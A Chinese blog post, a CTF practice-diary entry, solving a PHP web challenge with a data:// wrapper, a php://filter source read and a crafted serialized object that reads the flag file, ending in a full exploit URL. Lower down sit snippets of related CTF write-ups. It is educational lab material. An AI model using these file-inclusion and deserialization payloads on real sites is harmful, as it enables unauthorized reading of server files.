ctf打卡第7天

最新推荐文章于 2022-08-10 11:22:10 发布
最新推荐文章于 2022-08-10 11:22:10 发布
阅读量256 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/118032432
版权

打开网页,查看源代码是这样的
在这里插入图片描述
首先判断是否存在一个$user,并且读取文件===the user is admin
我们可以用php伪协议读取,他就会完整的等于文件内容
data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=
之后包含并且读取class.php
file=php://filter/read=convert.base64-encode/resource=class.php
获得文件

<?php
class Read{//f1ag.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
        }
        return "__toString was called!";
    }
}
?>

反序列化,让file的值等于flag.php即可

<?php
class Read
{
    public $file = 'f1ag.php';
}
$a = new Read();
echo serialize($a);

O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
题目不全,类似题目第三题博客
pass=O:4:“Read”:1:{s:4:“file”;s:8:“f1ag.php”;}
所以终极payload:

?user=data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=&file=class.php&pass=O:4:%22Read%22:1:{s:4:%22file%22;s:8:%22f1ag.php%22;}

flag就出来了,flag在源码里
今天就到这了,溜溜球

盖世大宝剑a
关注
蓝鲸安全ctf打卡隐写篇----第一期
x519461623的博客
02-19 1974
第一期 1.雨中龙猫 考查base64编码和图片源码隐写 题目给出答案格式whalectf{xxx},将whalectf进行base64编码:d2hhbGVjdGY= notepad++打开源码搜索,发现并不能搜索到 因为base64编码过程会重新以6位分组,所以whalectf后面的字母可能会对whalectf的编码影响,所以搜索前几位d2hhbGVj 得到d2hhbGVjdGZ7TG 进行解...
CTF_打卡DAY16
煤矿路口西的博客
06-15 298
跟着《深入浅出密码学——常用加密技术原理和应用》学 P225-243 第九章《椭圆曲线密码体制》 椭圆曲线定义 加“+” 相宜点相加P+Q 相同点相加P+P 表达式: 点P的逆元 群操作的示例: Hasse’s 定理 点乘中的Double-and-Add算法 基于椭圆曲线的Diffie-Hellman密钥交换 示例: 习题 9.1 请计算以下曲线对应群内的加法: (1) (2,7)+(5,2) 请只使用便携式计算器。 由题意得,a=2 (1)s=(3x1^2+a)/2y1=1
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7715
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
php反序列化及__toString()
sinat_31884905的博客
02-21 3754
主要两个文件 index.php <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; if(preg_match("/f1a9/",$file)){ e
CTFhub技能书解题笔记-Cookie
qq_43006864的博客
12-09 1530
一:打开题目,主页给出的提示是,仅仅只有admin用户,才能看到flag 二、这里我们还是打开burpsuit,抓包看一下数据包。通过对该页面进行抓包,发现了cookie位置的值为:admin=0。那么可以理解为现在是因为admin=0,所以我们非admin用户,就无法看倒flag。 这里因为0和1通常用来表示“否”和“是”,所以这里我们将0改为1。 得到flag ...
ctf题php反序列化,[世安杯]一道关于php反序列化漏洞的题目
weixin_36440198的博客
04-01 1045
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本题:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
libcurl获取网页内容的C/C++代码
热门推荐
认知 行动 坚持
09-14 3万+
我们之前用socket API写过访问百度服务的程序, 今我们用libcurl来写写。 实际上后者是对前者的封装。 代码如下(注意:你要包含curl.h文件, 并在makefile中加入对应的静态库, 否则编译不过):
CTF_打卡DAY6&DAY7&DAY8
煤矿路口西的博客
06-07 330
跟着《深入浅出密码学——常用加密技术原理与应用》学 P83-94 第四章《高级加密标准》 AES密码
CTF_打卡day15
煤矿路口西的博客
06-14 466
跟着《深入浅出密码学——常用加密技术原理和应用》学 P211-225 第八章《基于离散对数问题的公钥密码体制》 Elgamal加密方案 示例: 习题 8.1 (1) | a | 1 | 2 | 3 | 4 | |–|--| | ord(a) | 1 | 4 | 4 | 2 | a^1=1 a^1=2 ; a^2=4 ; a^3=8=3mod5 ; a^4=16=1mod5 a^1=3 ; a^2=9=4mod5 ; a^3=27=2mod5 ; a^4=81=1mod5 a^1=4 ; a^2=16=
CTF_打卡DAY3
煤矿路口西的博客
06-02 799
跟着《深入浅出密码学——常用加密技术原理与应用》学 P32-P50 第2章《序列密码》 线性反馈移位寄存器(LFSR) 简单公式:假设初始状态位s0,s1,s2,则输出位 s3=s1+s0 mod 2 s4=s2+s1 mod 2 s5=s3+s2 mod 2 …… 综上 s(i+3)=s(i+1) +s(i) mod 2 (或s(i+3)=s(i+1)⊕s(i)) 习题 2.1 (1)解密以下密文: bsaspp kkuosp rsidpy dkawoa (2)该年轻人是如何被谋杀的? 注:由于本
BUUCTF解题web十一道(02)
qq_45837896的博客
06-01 1311
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这里我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
php get请求_ctf中关于php伪协议的考查
weixin_39928003的博客
11-30 511
原创:Archerx 合智汇1php://input协议第一个例子flag.php<?php$flag = 'flag{flag_is_here}'; test1.php<?phpinclude('flag.php');$a= $_GET["a"];if(isset($a)&&(file_get_contents($a,'r'))=== 'this is tes...
ctf题php反序列化,从一道CTF题中学习php反序列化与伪协议
weixin_39927214的博客
04-01 1848
之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例题来了解何为php反序列,以及php伪协议。原题:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
DASCTF2022.07赋能赛 WEB题目复现
绮洛Ki1ro的博客
08-10 1191
其实7月时就想复现了,感觉题目质量挺高的,但奈何自己太菜看不懂就先搁置了。现在有能力回来填坑啦,但最后一题目前对自己理解起来还是有点难度,之后再研究研究。
[CTF]No.0002 莫桑比克-php是最好的语言(待完善)
林毅洋
08-10 1476
每日一题CTF 0002莫桑比克-php是最好的语言来源:HBCTF第一场WP 类别:php伪协议、data协议 来源:http://www.moonsos.com/post/256.html 用到工具:HxD(16进制编辑器) 或 winhex      WINRAR 或 好压 (查看 CRC32)题目地址:http://123.206.66.106(已失效)右击查看源码you are
ISCC2020-Web题解
Lemon's blog
05-27 2214
神秘组织的邮件-2 点击提交数字会发生改变,因为这次的赛制有一个关联,通过上一题 得出的flag是加键乘除,又提示要联系起来,就想起了之前做有一道秋名山车神那道题,只不过这个题需要将运算符手动添加,脚本如下: import requests from bs4 import BeautifulSoup import re import time if __name__ == '__main__': time_start=time.time() url = 'http://101.201.126
php的filter input,记一个php://filter和php://input的CTF
weixin_42175035的博客
03-10 281
首先直接查看源码,可以获得题目中的提示you are not the number of bugku !通过审计源码知道需求如下:需要通过GET方式传递三个参数必须存在$user读取的$user文件内容===welcome to the bugkuctf$file要求为hint.php关于php://input (官方说明)可以读取没有处理过的POST数据,相较于$HTTP_RAW_POST_DA...
admin--jarvisoj平台web题
D-R0s1的博客
09-10 465
       最近在练习ctf中的web题,一般来说,按我的做题习惯,拿到一个web题以后,先右键查看源代码,简单的审计一下,关注一下可疑的地方,然后用御剑扫一波,之后的话,就要就题论题了,我觉得在以后的几篇文章中很有必要将web的一些出题解题的思路来分门别类的整理一下。 拿到web题以后,先用御剑扫一波: 扫出robots.txt,打开后发现一个假的flag, 出来假的flag也没...
nssctf刷题
weixin_63231007的博客
04-30 1149
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
CTF脚本ctf.py的技术要点解析
7. 逻辑思维和问题解决:在CTF中,通常需要快速理解问题、分析漏洞并设计解决方案,这需要较强的逻辑思维能力和问题解决能力。 CTF不仅是一个技术竞赛,也是一个学习和实践的过程。通过参与CTF,选手可以不断学习新...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值